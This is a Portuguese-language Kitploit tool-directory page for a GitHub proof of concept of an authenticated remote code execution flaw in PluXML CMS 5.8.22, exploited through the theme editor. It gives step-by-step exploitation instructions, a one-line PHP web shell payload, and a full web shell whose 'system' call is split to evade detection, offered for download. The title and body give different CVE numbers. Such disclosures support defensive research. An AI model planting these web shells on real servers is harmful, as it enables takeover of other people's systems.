Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-67435 — A critical Remote Code Execution (RCE) vulnerability has been identified in PluXML CMS version 5.8.22. This vulnerability allows authenticated administrators to execute arbitrary PHP code on the web server by uploading malicious PHP web shells through the theme editor functionality. | Kitploit
Ferramentas/GitHubGitHub/rajchowdhury240/cve-2025-67435
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubrajchowdhury240/cve-2025-67435

CVE-2025-67435

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

1há 7 mesesAinda não revisado

A critical Remote Code Execution (RCE) vulnerability has been identified in PluXML CMS version 5.8.22. This vulnerability allows authenticated administrators to execute arbitrary PHP code on the web server by uploading malicious PHP web shells through the theme editor functionality.

Compartilhar

CVE-2025-67436

Execução Remota de Código (RCE) Autenticada no PluXml CMS 5.8.22

Pesquisador : Chowdhury Faizal Ahammed

Instalação

root@kitploit:~
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
imagem imagem imagem imagem imagem

Prova de Conceito

Exploração Passo a Passo

Autenticação: Faça login no painel de administração do PluXML com credenciais de administrador válidas Navegue até o Editor de Temas:

Acesse o painel de administração Navegue até: Temas → Home.php → Editar imagem

Injetar Payload Malicioso:

  • Substitua o conteúdo existente em home.php por um web shell PHP
  • Exemplo de payload: <?php system($_GET['cmd']); ?>
  • Salve o arquivo modificado

Acionar Execução:

Visite a página inicial do site O código PHP injetado é executado com privilégios do servidor web

  • Comandos remotos podem ser executados via: http://target.com/?cmd=whoami

Reverse Shell

imagem

Payload do webshell

root@kitploit:~
<html>
  <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
      <input
        type="TEXT"
        name="cmd"
        autofocus
        id="cmd"
        size="80"
      >
      <input
        type="SUBMIT"
        value="Execute"
      >
    </form>

    <pre>
<?php
if (isset($_GET['cmd'])) {
    $func_name = "sys" . "tem";
    $func_name($_GET['cmd']);
}
?>
    </pre>
  </body>
</html>
imagem imagem

Referências

  • CVE-2025-67436: https://nvd.nist.gov/vuln/detail/CVE-2025-67436
  • Site Oficial do PluXML: https://www.pluxml.org/
  • Repositório GitHub do PluXML: https://github.com/pluxml/PluXml
  • OWASP Top 10 - A03:2021 Injeção: https://owasp.org/Top10/A03_2021-Injection/
Baixar ferramenta